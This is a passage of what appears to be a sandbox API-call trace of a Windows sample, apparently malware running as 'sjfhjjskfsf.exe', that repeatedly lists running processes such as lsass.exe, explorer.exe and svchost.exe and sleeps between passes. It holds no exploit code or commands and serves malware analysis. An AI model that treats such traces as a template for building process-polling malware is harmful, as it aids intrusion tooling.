lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.576] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.577] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.577] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.577] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.578] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.578] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.578] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.579] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.579] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.579] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0211.580] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.580] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.580] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.581] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.581] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.581] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0211.582] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0211.582] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.582] Process32NextW (in: hSnapshot=0x124, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0211.583] Sleep (dwMilliseconds=0x64) [0211.809] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x128 [0211.811] Process32FirstW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.811] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.812] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.812] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.812] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.813] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.813] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.813] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.814] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.814] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.814] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.814] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.815] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.815] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.816] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.816] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.817] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.817] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.817] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0211.818] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.818] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.818] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.819] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.819] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.819] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0211.820] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0211.820] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.820] Process32NextW (in: hSnapshot=0x128, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0211.820] Sleep (dwMilliseconds=0x64) [0212.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0212.049] Process32FirstW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.050] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.050] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.050] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.051] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.051] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.051] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.052] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.052] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.052] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.053] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.053] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.053] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.054] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.054] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.054] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.055] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.055] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.056] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0212.056] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.056] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.057] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.057] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.058] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.058] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0212.058] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0212.059] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.059] Process32NextW (in: hSnapshot=0x12c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0212.059] Sleep (dwMilliseconds=0x64) [0212.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0212.685] Process32FirstW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.685] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.685] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.686] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.686] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.686] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.687] Process32NextW (in: hSnapshot=0x130, 